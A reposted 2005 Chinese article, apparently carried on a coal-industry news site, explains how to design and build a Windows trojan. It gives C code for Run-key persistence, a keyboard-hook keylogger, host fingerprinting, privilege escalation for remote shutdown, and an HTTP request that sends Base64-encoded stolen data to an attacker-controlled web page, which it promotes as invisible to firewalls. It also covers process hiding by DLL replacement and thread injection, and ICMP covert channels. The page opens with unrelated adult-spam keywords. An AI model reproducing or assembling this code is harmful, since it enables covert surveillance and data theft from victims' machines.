一级一区免费黄色,人人弄人人摸人人擦,亚洲黄色网站第二,欧美一区黄色网站

當(dāng)前位置:首頁(yè) -> 焦點(diǎn)新聞

WINDOWS系統(tǒng)下木馬程序的設(shè)計(jì)與實(shí)現(xiàn)

2005/1/18 18:54:48       
 
紀(jì)勇 李祥和
  

引言

    近年來(lái),黑客攻擊層出不窮,對(duì)網(wǎng)絡(luò)安全構(gòu)成了極大的威脅。木馬是黑客的主要攻擊手段之一,它通過(guò)滲透進(jìn)入對(duì)方主機(jī)系統(tǒng),從而實(shí)現(xiàn)對(duì)目標(biāo)主機(jī)的遠(yuǎn)程操作,破壞力相當(dāng)之大。

    到目前為止,木馬的發(fā)展已經(jīng)歷了五代:

    第一代木馬只是實(shí)現(xiàn)簡(jiǎn)單的密碼竊取、發(fā)送等,在隱藏和通信方面均無(wú)特別之處。
    第二代木馬的典型代表是冰河,它以文件關(guān)聯(lián)方式啟動(dòng),通過(guò)電子郵件傳送信息,在木馬技術(shù)發(fā)展史上開(kāi)辟了新的篇章。
    第三代木馬的信息傳輸方式有所突破,采用ICMP協(xié)議,增加了查殺的難度。
    第四代木馬在進(jìn)程隱藏方面獲得了重大突破,采用插入內(nèi)核的嵌入方式、利用遠(yuǎn)程插入線程技術(shù)、嵌入DLL線程、或掛接PSAPI等,實(shí)現(xiàn)木馬程序的隱藏,利用反彈端口技術(shù)突破防火墻限制,在Windows NT/2000下取得了良好的隱藏效果。
    第五代木馬與病毒緊密結(jié)合,利用操作系統(tǒng)漏洞,直接實(shí)現(xiàn)感染傳播的目的,而不必象以前的木馬那樣需要欺騙用戶主動(dòng)激活,例如最近新出現(xiàn)的類(lèi)似沖擊波病毒的木馬—噩夢(mèng)II。

    木馬的關(guān)鍵技術(shù)

    木馬基于C/S模式,服務(wù)器端程序運(yùn)行于被控制的主機(jī)上,客戶端完成控制功能。設(shè)計(jì)木馬時(shí),需考慮幾個(gè)關(guān)鍵因素:首先要具有深度的隱蔽性,保證木馬的隱蔽運(yùn)行和啟動(dòng),其次要能順利實(shí)現(xiàn)客戶端與服務(wù)器端的通信,最后還要根據(jù)需要實(shí)現(xiàn)其他功能。

一、木馬的隱藏

    有兩種方法可以隱藏木馬:一種是DLL 木馬,它讓木馬消失在進(jìn)程列表里,但程序的進(jìn)程仍然存在;另一種方法則是線程注入式木馬,它讓程序徹底消失,不以進(jìn)程或服務(wù)方式工作。

    1、DLL木馬

    只要把木馬服務(wù)器端的程序注冊(cè)為一個(gè)服務(wù),系統(tǒng)就不會(huì)再把它當(dāng)作進(jìn)程,程序便會(huì)從任務(wù)列表中消失,按下Ctrl+Alt+Delete后,也就看不到該程序。

   此方法首先要裝載Kernel32.dll,然后在該DLL中確定函數(shù)RegisterServiceProcess()的地址進(jìn)行調(diào)用,但只適用于Windows9x/Me的系統(tǒng),Windows NT/2000通過(guò)服務(wù)管理器依然能夠發(fā)現(xiàn)在系統(tǒng)中注冊(cè)過(guò)的服務(wù)。

    在Windows NT/2000下可采用過(guò)濾進(jìn)程的方法(即API攔截技術(shù)),通過(guò)建立一個(gè)后臺(tái)系統(tǒng)鉤子(hook),攔截PSAPI的EnumProcessModules等相關(guān)函數(shù)控制進(jìn)程和服務(wù)的遍歷調(diào)用,當(dāng)檢測(cè)到木馬程序的服務(wù)器端進(jìn)程時(shí)直接跳過(guò),從而實(shí)現(xiàn)進(jìn)程的隱藏。這種方法應(yīng)用廣泛,除了用于進(jìn)程隱藏以外,還廣泛應(yīng)用于諸多即時(shí)軟件,如金山詞霸就使用類(lèi)似方法,攔截TextOutA、TextOutW函數(shù),截獲屏幕輸出,實(shí)現(xiàn)即時(shí)翻譯。

    DLL文件是Windows的基礎(chǔ),所有的API函數(shù)都是在DLL中實(shí)現(xiàn)的。DLL由多個(gè)功能函數(shù)構(gòu)成,入口函數(shù)是DllMain,它并不能獨(dú)立運(yùn)行,一般由進(jìn)程加載并調(diào)用。由于DLL文件不能獨(dú)立運(yùn)行,所以在進(jìn)程列表中并不會(huì)出現(xiàn)DLL,而只出現(xiàn)加載進(jìn)程。運(yùn)行DLL文件隱藏進(jìn)程的最簡(jiǎn)單方法是利用Rundll32.exe,但也很容易被識(shí)破,比較高級(jí)的做法是使用特洛伊DLL,它使用木馬DLL替換常用的DLL文件,通過(guò)函數(shù)轉(zhuǎn)發(fā)器將正常的調(diào)用轉(zhuǎn)發(fā)給原DLL,截獲并處理特定的消息。但是,WINDOWS操作系統(tǒng)對(duì)此具有相當(dāng)?shù)姆婪叮琖in2000的system32目錄下有一個(gè)dllcache目錄,存放著大量的DLL文件(還包括一些重要的exe文件),一旦操作系統(tǒng)發(fā)現(xiàn)被保護(hù)的DLL文件被篡改,就會(huì)自動(dòng)從dllcache中恢復(fù)該文件。此外,特洛伊DLL方法本身也存在一些漏洞(如修復(fù)安裝、安裝補(bǔ)丁、升級(jí)系統(tǒng)、檢查數(shù)字簽名等都可能導(dǎo)致特洛伊DLL失效),并不是DLL木馬的最優(yōu)選擇。盡管如此,仍有很多方法可以繞過(guò)DLL保護(hù)(如先更改dllcache目錄中的備份再修改DLL文件、或利用KnownDLLs鍵值更改DLL的默認(rèn)啟動(dòng)路徑等)。

    2、線程注入式木馬

    更好的隱藏方式是使木馬程序不以進(jìn)程和服務(wù)的方式存在,而是完全溶入系統(tǒng)內(nèi)核。因此,在設(shè)計(jì)時(shí),我們不應(yīng)把它做成一個(gè)應(yīng)用程序,而是做成一個(gè)可以注入應(yīng)用程序地址空間的線程。該應(yīng)用程序必須確保絕對(duì)安全,這樣才能達(dá)到徹底隱藏的效果,增加查殺的難度。線程注入式木馬采用動(dòng)態(tài)嵌入技術(shù)將自己的代碼嵌入正在運(yùn)行的進(jìn)程中。

    Windows中每個(gè)進(jìn)程都有自己的私有內(nèi)存空間,其他進(jìn)程不得對(duì)該私有空間進(jìn)行操作,但實(shí)際上,有很多方法可操作私有空間。動(dòng)態(tài)嵌入技術(shù)很多,如窗口Hook、掛接API、遠(yuǎn)程線程等,遠(yuǎn)程線程技術(shù)相對(duì)簡(jiǎn)單,只要有基本的進(jìn)程線程和動(dòng)態(tài)鏈接庫(kù)的知識(shí)就可以輕松實(shí)現(xiàn)。

    遠(yuǎn)程線程技術(shù)指的是通過(guò)在一個(gè)遠(yuǎn)程進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法進(jìn)入該進(jìn)程的內(nèi)存地址空間。可以通過(guò)CreateRemoteThread函數(shù)在一個(gè)遠(yuǎn)程進(jìn)程內(nèi)創(chuàng)建遠(yuǎn)程線程,被創(chuàng)建的遠(yuǎn)程線程可以共享遠(yuǎn)程進(jìn)程的地址空間,這樣就可以通過(guò)該線程進(jìn)入遠(yuǎn)程進(jìn)程的內(nèi)存地址空間,從而擁有了遠(yuǎn)程進(jìn)程相當(dāng)?shù)臋?quán)限,如在遠(yuǎn)程進(jìn)程內(nèi)部啟動(dòng)一個(gè)DLL木馬,甚至可以隨意篡改其中的數(shù)據(jù)。遠(yuǎn)程線程技術(shù)的關(guān)鍵在于要將線程函數(shù)執(zhí)行體及其參數(shù)復(fù)制到遠(yuǎn)程進(jìn)程空間中,否則遠(yuǎn)程線程會(huì)在執(zhí)行時(shí)因找不到參數(shù)而報(bào)錯(cuò)。

二、木馬服務(wù)器端程序的自加載運(yùn)行

    程序自運(yùn)行的常見(jiàn)方法有:加載程序到啟動(dòng)組;將程序啟動(dòng)路徑寫(xiě)到注冊(cè)表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersions\Run子鍵(以及RunOnce、RunService、RunOnceService等);修改Boot.ini;通過(guò)注冊(cè)表中的輸入法鍵值直接掛接啟動(dòng);修改Explorer.exe啟動(dòng)參數(shù)以及在win.ini和system.ini中的load節(jié)中添加啟動(dòng)項(xiàng);在Autoexec.bat中添加程序等。

    下面的程序通過(guò)修改注冊(cè)表中HKEY_LOCAL_MACHINE\ Microsoft\ SOFTWARE\Windows\CurrentVersions\Run的鍵值實(shí)現(xiàn)木馬的自啟動(dòng):

RegCreateKeyEx(
HKEY_LOCAL_MACHINE,  // handle to open key
" SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",   // subkey
0,NULL,                          // class string
REG_OPTION_NON_VOLATILE,       // special options
KEY_READ|KEY_WRITE,           // desired security access
NULL,&mKeyClass,&dwDisposition           // disposition value buffer
);
RegSetValueEx(mKeyClass,NULL,0,REG_SZ,
(const unsigned char *)Name, lstrlen(PathBuf)+1);
RegCloseKey(mKeyClass);

    冰河木馬就采用了文件關(guān)聯(lián)實(shí)現(xiàn)木馬的啟動(dòng)。以文本文件關(guān)聯(lián)為例,注冊(cè)表中HKEY_CLASSES_ROOT\txtfile\shell\open\command的值是文本文件(*.txt文件)的關(guān)聯(lián)處,缺省為“%SystemRoot%\system32\NOTEPAD.EXE %1”,將其改為木馬程序,那么,以后打開(kāi)文本文件時(shí)就會(huì)先執(zhí)行木馬程序,木馬啟動(dòng)后,再運(yùn)行notepad.exe打開(kāi)指定文件。這個(gè)過(guò)程在一般人來(lái)看,好像什么事也沒(méi)發(fā)生過(guò)。

    DLL木馬替換了系統(tǒng)原有的動(dòng)態(tài)連接庫(kù),系統(tǒng)裝載這些連接庫(kù)時(shí)就啟動(dòng)了木馬。這種啟動(dòng)方式相當(dāng)隱蔽,著名的GINA木馬就是通過(guò)替換系統(tǒng)的GINA程序,在木馬DLL中導(dǎo)出系統(tǒng)函數(shù),實(shí)現(xiàn)系統(tǒng)正常功能,然后再根據(jù)需要實(shí)現(xiàn)自身的木馬功能。

三、木馬程序的通信

    木馬程序傳遞數(shù)據(jù)的方法很多,最常見(jiàn)是用TCP、UDP協(xié)議,但這種方法的隱蔽性比較差,容易查到,例如,用netstat命令就可以查看到當(dāng)前活動(dòng)的TCP、UDP連接。

    但仍有很多手段躲避這種偵察,筆者曾嘗試過(guò)以下兩種方法:

    一種方法是將木馬的通信連接綁定在通用端口上,通過(guò)這些服務(wù)端口發(fā)送信息。例如:將被攻擊主機(jī)的信息以電子郵件的形式傳送到攻擊者的電子信箱或上傳到某FTP主機(jī)上,也可用免費(fèi)主頁(yè)空間作信息中轉(zhuǎn)站。利用FTP協(xié)議將信息上傳到FTP站點(diǎn)的做法很容易被跟蹤,利用SMTP協(xié)議將信息通過(guò)電子郵件方式回傳不易被反跟蹤,最多只能找到攻擊者信箱,但防火墻和一些殺毒軟件發(fā)現(xiàn)本地有郵件發(fā)送時(shí),可能會(huì)將其屏蔽并提示用戶。利用HTTP協(xié)議上傳信息對(duì)攻擊者相當(dāng)安全,防火墻無(wú)法分辨?zhèn)魉偷男畔⑹怯脩羯暇W(wǎng)瀏覽的交互信息還是木馬發(fā)送的個(gè)人信息,這種方法將在后面進(jìn)行詳細(xì)介紹。但是,這些手段都要通過(guò)建立TCP連接傳遞命令和數(shù)據(jù)的,所以存在一個(gè)致命漏洞:木馬在等待和運(yùn)行的過(guò)程中,始終有一個(gè)和外界聯(lián)系的端口打開(kāi)著。

    另一種辦法是使用ICMP協(xié)議。ICMP報(bào)文由系統(tǒng)內(nèi)核或進(jìn)程直接處理而不通過(guò)端口,如果木馬將自己偽裝成一個(gè)Ping進(jìn)程,系統(tǒng)就會(huì)將ICMP_ECHOREPLY(Ping的回應(yīng)包)的監(jiān)聽(tīng)、處理權(quán)交給木馬進(jìn)程,一旦事先約定好的ICMP_ECHOREPLY包出現(xiàn)(這樣的包經(jīng)過(guò)修改ICMP包頭,加入了木馬的控制字段),木馬就會(huì)接受、分析并從報(bào)文中解析出命令和數(shù)據(jù)。防火墻一般不會(huì)對(duì)ICMP_ECHOREPLY報(bào)文進(jìn)行過(guò)濾,因?yàn)檫^(guò)濾ICMP_ECHOREPLY報(bào)文就意味著主機(jī)無(wú)法對(duì)外進(jìn)行Ping等路由診斷操作。

    DLL木馬的功能實(shí)現(xiàn)

    木馬的主要功能包括:獲取擊鍵記錄、獲取主機(jī)信息、上傳主機(jī)信息以及接受控制端命令遠(yuǎn)程關(guān)機(jī)等。

    1、在主程序中設(shè)置鉤子:

    實(shí)現(xiàn)記錄按鍵的方法主要利用鍵盤(pán)鉤子和通過(guò)設(shè)計(jì)低層鍵盤(pán)驅(qū)動(dòng)程序?qū)崿F(xiàn),使用鍵盤(pán)鉤子實(shí)現(xiàn)的代碼如下:

SetWindowsHookEx(WH_JOURNALRECORD,KeyboardProc,g_module,0);
其中KeyboardProc是回調(diào)函數(shù):
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
if(code<0) return CallNextHookEx(g_hLogHook,code,wParam,lParam);
if(code==HC_ACTION)
{
EVENTMSG *pEvt=(EVENTMSG *)lParam;
if(pEvt->message==WM_KEYDOWN)
{
…//判斷是否擊鍵,是則記錄到文件中
}
}
return CallNextHookEx(g_hLogHook,code,wParam,lParam);
}

    2、獲取主機(jī)信息(包括主機(jī)名、IP地址、操作系統(tǒng)版本等):

WORD wVersionRequested = MAKEWORD(1, 1);
WSADATA wsaData;
WSAStartup(wVersionRequested, &wsaData);
char hostname[256];
int res = gethostname(hostname, sizeof(hostname));   //獲取主機(jī)名
hostent* pHostent = gethostbyname(hostname);   //獲取主機(jī)IP地址
hostent& he = *pHostent;
sockaddr_in sa;
memcpy ( &sa.sin_addr.s_addr, he.h_addr_list[0],he.h_length);
lstrcpy(&MyIP[0] , inet_ntoa(sa.sin_addr));
WSACleanup();
dwVersion = GetVersion(); //得到WINDOWS的版本號(hào)
dwWindowsMajorVersion =  (DWORD)(LOBYTE(LOWORD(dwVersion)));
dwWindowsMinorVersion =  (DWORD)(HIBYTE(LOWORD(dwVersion)));
if (dwVersion < 0x80000000)                // 是Windows NT系統(tǒng)
    dwBuild = (DWORD)(HIWORD(dwVersion));
else if (dwWindowsMajorVersion < 4)        // 是Win32系統(tǒng)
    dwBuild = (DWORD)(HIWORD(dwVersion) & ~0x8000);
else         // 是Windows 95系統(tǒng)
    dwBuild =  0;

    3、遠(yuǎn)程關(guān)機(jī):

    當(dāng)木馬程序接收到關(guān)機(jī)命令時(shí),執(zhí)行關(guān)機(jī)操作,需要提升權(quán)限,否則系統(tǒng)認(rèn)為權(quán)限不夠?qū)⒔蛊鋱?zhí)行。

提升權(quán)限:
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
return;
LookupPrivilegeValue( NULL, SE_SHUTDOWN_NAME, &sedebugnameValue );
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
CloseHandle( hToken );
關(guān)機(jī):
ExitWindowsEx(EWX_SHUTDOWN,  0);

    4、上傳主機(jī)信息:

    木馬獲取主機(jī)信息之后,將其回傳到攻擊者主機(jī)、郵箱或主頁(yè)空間。

上傳到主頁(yè)空間要使用HTTP協(xié)議,構(gòu)造協(xié)議包如下:
char header[1324]="GET HTTP://";
char html[]="HTTP/1.0\r\n Accept:*/*\r\nAccept-language:ZH-cn\r\n
User-Agent:Mozilla/4.0(compatible,MSIE,windows95)\r\nhost:";
char hend[]="\r\nproxy-connection:keep-alive\r\n\r\n";
然后填充信息:
lstrcat(header,hmyip[0]);// hmyip即為攻擊者的主頁(yè)空間地址
lstrcat(header,"/cgi-bin/fh.cgi?");
lstrcat(header,str);    //str就是要上傳的信息,需要先經(jīng)過(guò)Base64編碼
lstrcat(header,html);
lstrcat(header,hmyip[0]);
lstrcat(header,hend);

    構(gòu)造好協(xié)議包之后,利用socket通信將該包發(fā)給服務(wù)器即可。這種方法安全隱蔽,防火墻無(wú)法判斷出傳送的數(shù)據(jù)是否合法。

    5、新的傳播方式:以往的木馬在傳播方式上缺乏十分有效的手段,主要利用社會(huì)工程學(xué)知識(shí)誘騙用戶點(diǎn)擊鏈接,或?qū)⒛抉R程序與其他程序捆綁在一起,欺騙用戶執(zhí)行程序。隨著人們安全意識(shí)的不斷提高,這種方法已經(jīng)越來(lái)越難奏效。病毒的傳播方式啟發(fā)木馬的設(shè)計(jì)者利用操作系統(tǒng)漏洞(如WINDOWS系統(tǒng)下的緩沖區(qū)溢出漏洞),將木馬代碼寫(xiě)入SHELLCODE,只要通過(guò)遠(yuǎn)程向目標(biāo)主機(jī)發(fā)送一個(gè)數(shù)據(jù)包,目標(biāo)主機(jī)就會(huì)發(fā)生緩沖區(qū)溢出,代碼跳轉(zhuǎn)執(zhí)行SHELLCODE,將木馬植入目標(biāo)主機(jī),無(wú)需用戶介入。沖擊波病毒就是利用了WINDOWS系統(tǒng)的RPC漏洞。

結(jié)束語(yǔ)

    “道高一尺、魔高一丈”,攻擊與防御是相輔相承的關(guān)系,攻擊手段的進(jìn)步最終必然導(dǎo)致防御技術(shù)的提高,而為了突破防御能力增強(qiáng)的系統(tǒng),攻擊者又會(huì)找到新的攻擊方式,木馬技術(shù)也將隨之得以不斷的擴(kuò)充和發(fā)展。

煤炭網(wǎng)版權(quán)與免責(zé)聲明:

凡本網(wǎng)注明"來(lái)源:煤炭網(wǎng)m.shanesbookmarks.com "的所有文字、圖片和音視頻稿件,版權(quán)均為"煤炭網(wǎng)m.shanesbookmarks.com "獨(dú)家所有,任何媒體、網(wǎng)站或個(gè)人在轉(zhuǎn)載使用時(shí)必須注明"來(lái)源:煤炭網(wǎng)m.shanesbookmarks.com ",違反者本網(wǎng)將依法追究責(zé)任。

本網(wǎng)轉(zhuǎn)載并注明其他來(lái)源的稿件,是本著為讀者傳遞更多信息的目的,并不意味著本網(wǎng)贊同其觀點(diǎn)或證實(shí)其內(nèi)容的真實(shí)性。其他媒體、網(wǎng)站或個(gè)人從本網(wǎng)轉(zhuǎn)載使用時(shí),必須保留本網(wǎng)注明的稿件來(lái)源,禁止擅自篡改稿件來(lái)源,并自負(fù)版權(quán)等法律責(zé)任。違反者本網(wǎng)也將依法追究責(zé)任。 如本網(wǎng)轉(zhuǎn)載稿件涉及版權(quán)等問(wèn)題,請(qǐng)作者在兩周內(nèi)盡快來(lái)電或來(lái)函聯(lián)系。

  • 用手機(jī)也能做煤炭生意啦!
  • 中煤遠(yuǎn)大:煤炭貿(mào)易也有了“支付寶”
  • 中煤開(kāi)啟煤炭出口貿(mào)易人民幣結(jié)算新時(shí)代
  • 下半年煤炭市場(chǎng)依然嚴(yán)峻
市場(chǎng)動(dòng)態(tài)

網(wǎng)站技術(shù)運(yùn)營(yíng):北京真石數(shù)字科技股份有限公司、喀什中煤遠(yuǎn)大供應(yīng)鏈管理有限公司、喀什煤網(wǎng)數(shù)字科技有限公司

總部地址:北京市豐臺(tái)區(qū)總部基地航豐路中航榮豐1層

京ICP備18023690號(hào)-1      京公網(wǎng)安備 11010602010109號(hào)


關(guān)注中煤遠(yuǎn)大微信
跟蹤最新行業(yè)資訊